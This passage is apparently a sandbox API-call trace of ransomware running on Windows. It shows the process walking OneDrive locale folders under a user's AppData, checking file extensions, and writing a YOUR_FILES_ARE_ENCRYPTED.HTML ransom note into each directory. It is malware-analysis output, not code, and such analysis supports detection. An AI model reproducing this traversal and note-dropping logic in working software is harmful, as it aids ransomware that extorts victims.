RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ne-np\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.618] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.619] CloseHandle (hObject=0x328) returned 1 [0112.619] GetProcessHeap () returned 0x600000 [0112.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.619] GetProcessHeap () returned 0x600000 [0112.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.619] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0c0f2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xa0c0f2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xa0c0f2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nl", cAlternateFileName="")) returned 1 [0112.619] StrStrIW (lpFirst="nl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.620] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl") returned 78 [0112.620] GetProcessHeap () returned 0x600000 [0112.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.620] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl" [0112.621] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\*" [0112.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0c0f2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xa0c0f2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xacd2f90, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.621] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0c0f2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xa0c0f2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xacd2f90, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.621] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd2f90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xacd2f90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb5515c4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.622] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.622] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.622] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.622] lstrlenW (lpString=".mui") returned 4 [0112.622] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.622] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd2f90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xacd2f90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb5515c4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.622] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.622] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.622] GetProcessHeap () returned 0x600000 [0112.622] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.622] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.623] CloseHandle (hObject=0x328) returned 1 [0112.623] GetProcessHeap () returned 0x600000 [0112.623] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.623] GetProcessHeap () returned 0x600000 [0112.623] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.624] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5515c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb5515c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb5515c4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nn-no", cAlternateFileName="")) returned 1 [0112.624] StrStrIW (lpFirst="nn-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.624] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no") returned 81 [0112.624] GetProcessHeap () returned 0x600000 [0112.624] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.626] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no" [0112.626] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\*" [0112.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5515c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb5515c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbd5d4c4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0112.627] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5515c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb5515c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbd5d4c4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.627] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5d4c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbd5d4c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc2484cb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.627] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.627] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.627] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.627] lstrlenW (lpString=".mui") returned 4 [0112.627] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.627] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5d4c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbd5d4c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc2484cb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.627] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0112.627] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.627] GetProcessHeap () returned 0x600000 [0112.627] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\nn-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.628] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.629] CloseHandle (hObject=0x328) returned 1 [0112.629] GetProcessHeap () returned 0x600000 [0112.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.629] GetProcessHeap () returned 0x600000 [0112.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.630] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc593d87, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc593d87, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc593d87, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nso-za", cAlternateFileName="")) returned 1 [0112.630] StrStrIW (lpFirst="nso-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.630] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za") returned 82 [0112.630] GetProcessHeap () returned 0x600000 [0112.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.631] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za" [0112.631] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\*" [0112.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc593d87, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc593d87, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc88a52c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626978 [0112.632] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc593d87, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc593d87, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc88a52c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.633] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc88a52c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc88a52c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd4e8897, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.633] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.633] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\FileSync.LocalizedResources.dll.mui") returned 118 [0112.633] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.633] lstrlenW (lpString=".mui") returned 4 [0112.633] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.633] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc88a52c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc88a52c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd4e8897, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.633] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0112.633] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0112.633] GetProcessHeap () returned 0x600000 [0112.633] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\nso-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.634] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.634] CloseHandle (hObject=0x328) returned 1 [0112.635] GetProcessHeap () returned 0x600000 [0112.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.635] GetProcessHeap () returned 0x600000 [0112.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.635] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f40d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe50f40d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xefa8864, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x5d4c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0112.635] StrStrIW (lpFirst="OneDrive.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.635] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\OneDrive.exe") returned 88 [0112.636] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0112.636] lstrlenW (lpString=".exe") returned 4 [0112.636] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0112.636] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd63fe7d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd63fe7d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd63fe7d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="or-in", cAlternateFileName="")) returned 1 [0112.636] StrStrIW (lpFirst="or-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.642] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in") returned 81 [0112.642] GetProcessHeap () returned 0x600000 [0112.642] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.643] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in" [0112.643] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\*" [0112.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd63fe7d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd63fe7d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xdb049b8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.644] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd63fe7d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd63fe7d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xdb049b8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.644] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb049b8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xdb049b8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xdee5c50, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.644] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.644] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\or-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.645] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.645] lstrlenW (lpString=".mui") returned 4 [0112.645] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" 